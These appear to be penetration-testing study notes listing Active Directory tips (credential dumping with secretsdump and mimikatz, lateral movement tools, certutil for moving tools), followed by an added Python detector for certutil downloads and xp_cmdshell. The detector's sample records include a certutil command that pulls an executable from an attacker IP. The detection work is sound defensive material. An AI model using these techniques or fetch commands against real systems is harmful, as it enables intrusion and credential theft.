- Develop an AD methodology so as not to miss any enumeration steps
    - Enumeration is very iterative in AD
    - Basically redo all enumeration once we have new creds
- Check password policy and Defender status
- Try `responder` or `inveigh` from different machine/account POVs
    - We may get more hits with a higher-privileged account
- Have alternative tools ready for when things error out, hang, or don't work, since it may be a false negative
    - For instance, even though `nxc winrm` worked, `evil-winrm` did not for one machine
    - `impacket-psexec` and `psexec.py` leverage SMB
    - `wmiexec.py`, `atexec.py`, and `smbexec.py` are other options to try
- `bloodyAD` is primo for ACL abuse
- We can target specific users with `secretsdump.py` and `mimikatz`
- If we don't have access to `PowerShell` or we want to be stealthy, `certutil` is great for moving tools to a Windows host
- `mssqlclient.py` is much better than `sqsh`
    - See [[5 - CPTS Notes/7 - Attacking Common Services/4 - SQL DBs (1433,3306)|4 - SQL DBs (1433,3306)]] to enable `xp_cmdshell`
- Use the `-c` flag with `smbclient` to execute commands such as `dir`, `cd`, and `get`
    - Chain commands with semicolons like: `smbclient -U inlanefreight.local/alfred%<password> \\\\<target_ip>\\share -c "cd subfolder; mget *.txt"`
- Use the `-m` flag with `smbclient` to enforce the protocol version
    - For example, `-m SMB2` and `-m SMB3`
- A whiteboard helps to visualize the attack space
    - Also helpful to list out ideas to come back to when breaking overtime or for a meal
- Below is the visual for Part II

![[images/IMG_5393.jpg]]
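Two of the tricks in these notes leave distinctive host-side traces that the blue team will be looking for: `certutil` pulling a tool down from a URL, and `xp_cmdshell` being switched on and then spawning `cmd.exe` under `sqlservr.exe`. The script below is an added example (not from these notes or any of the tools named in them) that runs three simple detections over constructed, Sysmon-style process-creation records and SQL Server ERRORLOG lines; the record field names (`host`, `image`, `parent_image`, `cmdline`) and all sample values are assumptions made for the example.

```python
"""Added example: spot host-side traces of certutil downloads and xp_cmdshell use.

All telemetry below is constructed for this example. The dict field names are an
assumed, simplified rendering of Sysmon Event ID 1 (process creation) records.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# certutil's cache/verify switches are the ones used to fetch remote content.
CERTUTIL_FETCH_RE = re.compile(r"-(urlcache|verifyctl)\b", re.IGNORECASE)
# Wording SQL Server writes to ERRORLOG when sp_configure flips the option.
XP_CMDSHELL_ENABLED_RE = re.compile(
    r"Configuration option 'xp_cmdshell' changed from 0 to 1", re.IGNORECASE
)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return PureWindowsPath(image).name.lower()


def certutil_download(event: dict) -> bool:
    """certutil.exe run with a fetch switch and a URL on the command line."""
    return (
        basename(event["image"]) == "certutil.exe"
        and bool(CERTUTIL_FETCH_RE.search(event["cmdline"]))
        and bool(URL_RE.search(event["cmdline"]))
    )


def sql_spawned_shell(event: dict) -> bool:
    """xp_cmdshell executes through cmd.exe with sqlservr.exe as the parent."""
    return (
        basename(event["parent_image"]) == "sqlservr.exe"
        and basename(event["image"]) == "cmd.exe"
    )


def triage(events, errorlog_lines):
    """Run every rule and return findings in input order."""
    findings = []
    for ev in events:
        if certutil_download(ev):
            findings.append(Finding(ev["host"], "certutil_download", ev["cmdline"]))
        if sql_spawned_shell(ev):
            findings.append(Finding(ev["host"], "sqlservr_child_cmd", ev["cmdline"]))
    for host, line in errorlog_lines:
        if XP_CMDSHELL_ENABLED_RE.search(line):
            findings.append(Finding(host, "xp_cmdshell_enabled", line.strip()))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://10.10.14.5/tool.exe C:\Users\Public\t.exe"},
    # Benign certutil use: hashing a local file, no URL involved.
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -hashfile C:\Users\Public\installer.msi SHA256"},
    {"host": "SQL01", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c whoami'},
    # Ordinary interactive cmd.exe, parent is explorer.exe.
    {"host": "SQL01", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe"'},
]
SAMPLE_ERRORLOG = [
    ("SQL01", "2024-01-01 10:00:00.00 spid55 Configuration option 'show advanced options' "
              "changed from 0 to 1. Run the RECONFIGURE statement to install."),
    ("SQL01", "2024-01-01 10:00:01.00 spid55 Configuration option 'xp_cmdshell' "
              "changed from 0 to 1. Run the RECONFIGURE statement to install."),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS, SAMPLE_ERRORLOG):
        print(f"[{f.host}] {f.rule}: {f.detail}")
```

The parent/child check is the more robust of the three, since `xp_cmdshell` always goes through `cmd.exe` under the SQL Server service process regardless of which client (`mssqlclient.py`, `sqsh`, or anything else) enabled it.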